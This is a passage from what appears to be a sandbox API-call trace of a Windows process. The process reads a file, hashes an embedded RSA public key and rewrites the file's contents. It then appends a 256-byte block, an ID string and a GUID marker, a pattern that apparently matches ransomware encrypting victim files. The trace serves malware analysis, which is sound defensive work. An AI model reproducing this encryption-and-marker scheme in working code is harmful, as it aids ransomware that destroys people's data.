dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.916] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=56608) returned 1 [0189.916] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0189.919] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xdcfa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.919] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0189.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.921] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.922] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xdd20, lpOverlapped=0x0) returned 1 [0189.922] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0189.922] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.922] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.922] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea898) returned 1 [0189.923] CryptCreateHash (in: hProv=0x6ea898, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0189.923] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.924] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0189.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0189.924] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0189.924] GetLastError () returned 0x0 [0189.924] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0189.924] CryptReleaseContext (hProv=0x6ea898, dwFlags=0x0) returned 1 [0189.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0189.924] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0189.924] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0189.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.924] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0189.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xdd20) returned 0x2d45778 [0189.925] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0189.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0189.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0189.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39450 [0189.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a30 [0189.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39498 [0189.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a48 [0189.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a78 [0189.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ad8 [0189.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a90 [0189.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0189.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0189.926] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0189.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0189.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a78 | out: hHeap=0x6a0000) returned 1 [0189.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a90 | out: hHeap=0x6a0000) returned 1 [0189.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ad8 | out: hHeap=0x6a0000) returned 1 [0189.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0189.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ad8 [0189.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0189.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a90 [0189.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0189.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39a78 [0189.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0189.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0189.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0189.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0189.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0189.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0189.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0189.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0189.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a90 | out: hHeap=0x6a0000) returned 1 [0189.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a78 | out: hHeap=0x6a0000) returned 1 [0189.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ad8 | out: hHeap=0x6a0000) returned 1 [0189.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0189.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0189.929] GetCurrentThreadId () returned 0x264 [0189.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0189.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d44120 [0189.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0189.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0189.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0189.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0189.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.930] GetCurrentThreadId () returned 0x264 [0189.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c31700 [0189.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0189.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0189.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c829b0 [0189.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0189.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ad8 [0189.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0189.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0189.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0189.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a78 [0189.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0189.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0189.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0189.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0189.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a90 [0189.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0189.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0189.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0189.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a60 [0189.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0189.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39af0 [0189.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0189.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ac0 [0189.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39aa8 [0189.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b08 [0189.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39aa8 | out: hHeap=0x6a0000) returned 1 [0189.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39aa8 [0189.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ac0 | out: hHeap=0x6a0000) returned 1 [0189.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0189.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0189.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0189.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a78 | out: hHeap=0x6a0000) returned 1 [0189.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a78 [0189.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0189.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ad8 | out: hHeap=0x6a0000) returned 1 [0189.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0189.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b08 | out: hHeap=0x6a0000) returned 1 [0189.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0189.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0189.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0189.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a78 | out: hHeap=0x6a0000) returned 1 [0189.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0189.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0189.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0189.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0189.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0189.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0189.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0189.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0189.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0189.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0189.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39aa8 | out: hHeap=0x6a0000) returned 1 [0189.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39af0 | out: hHeap=0x6a0000) returned 1 [0189.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a90 | out: hHeap=0x6a0000) returned 1 [0189.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a60 | out: hHeap=0x6a0000) returned 1 [0189.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0189.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0189.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a48 | out: hHeap=0x6a0000) returned 1 [0189.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39498 | out: hHeap=0x6a0000) returned 1 [0189.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0189.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0189.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0189.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0189.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0189.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0189.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0189.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0189.944] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0xdd1b, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0xdd1b, lpOverlapped=0x0) returned 1 [0189.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0189.945] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xdd20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.945] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0189.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0189.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd28 [0189.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0189.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0189.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd28 | out: hHeap=0x6a0000) returned 1 [0189.946] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0189.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.947] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.947] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0189.947] CloseHandle (hObject=0x584) returned 1 [0189.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0189.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d42908 [0189.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 